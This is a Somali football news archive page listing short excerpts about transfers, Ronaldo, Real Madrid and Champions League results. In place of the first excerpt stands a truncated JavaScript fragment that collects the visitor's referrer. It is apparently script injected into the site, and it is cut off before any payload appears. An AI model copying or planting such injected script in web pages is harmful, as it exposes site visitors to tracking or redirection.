Scroll to Top

Category Archives: Ciyaaraha

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Mesut Ozil ayaa heshiis la gaaray kooxda Barcelona isagoo Arsenal ka dhaqaajindoona bisha January sida ay warinayaan wararka kasoo baxaya gudaha Spain. 29-sano jirkaan ayaa wax yar kaga harsan heshiiska...

Ciyaaryahankii hore ee kooxda Chelsea Frank Lampard ayaa kooxda Chelsea kula taliyey inay kusoo bilaabaan William iyo Eden Hazard kulanka ay la ciyaarayaan kooxda Liverpool habeenka sabtida. Xiddiga reer...

Weeraryahanka kooxda Real Madrid Cristiano Ronaldo oo horey usoo maray  kooxaha kala ah Manchester United , Sporting Lispon iyo kuwa kale waxaana xidigaan uu kamid yhay shaqsiyaadka guulaha ugu waa weyn...

Kooxaha qaar ayaa xaley lumiyey fursad ay kusoo gaari lahaayeen wareega 16-ka ee tartanka Champions League kadib markii natiijo layaab leh kasoo baxday kulamadaas. Kooxda Liverpool ayaa dhibaatada ugu...

Xaalada kooxda reer Spain ee Real Madrid ayaa meel xasaasi ah mareysa waxaana ay kooxdaan u baahan tahay isbedel weyn in lagu sameeyo sidaas darteeda Macalin Zidane iyo Madaxweeynaha kooxda Real Madrid...

Shaley Kulamada ugu xiisaha badan horyaalka Primer Lague ayaa la ciyaaray , waxaana kasoo baxday natiijo cajiib ah sababtoo ah  dhamaan natiijooyinka waxaaa ay noqdeen kuwa mar walba aan wax ka duwaneyn...

Weeraryahanka kooxda Real Madrid Cristiano Ronaldo ayaa sheegay inuu ka tegidoono kooxda Madrid marka uu dhamaado xilli ciyaareedkaan , waxaa uu sidoo kale xidigaan diiday inuu heshiis cusub u saxiixo...

Maalin wanaagsan dhaman asxaabta ku xeran Maandeeq.net kusoo dhowaada warbixinadii iyo sheekooyinkii la xiriiray xaqiiqooyinka kubadda cagta. Qeybta 2aad ee warbixintaan waxaad ku arkidoontaa waxyaabo...

Maalin wanaagsan dhaman asxaabta ku xeran Maandeeq.net kusoo dhowaada warbixinadii iyo sheekooyinkii la xiriiray xaqiiqooyinka kubadda cagta. Qeybta koowaad ee warbixintaan waxaad ku arkidoontaa waxyaabo...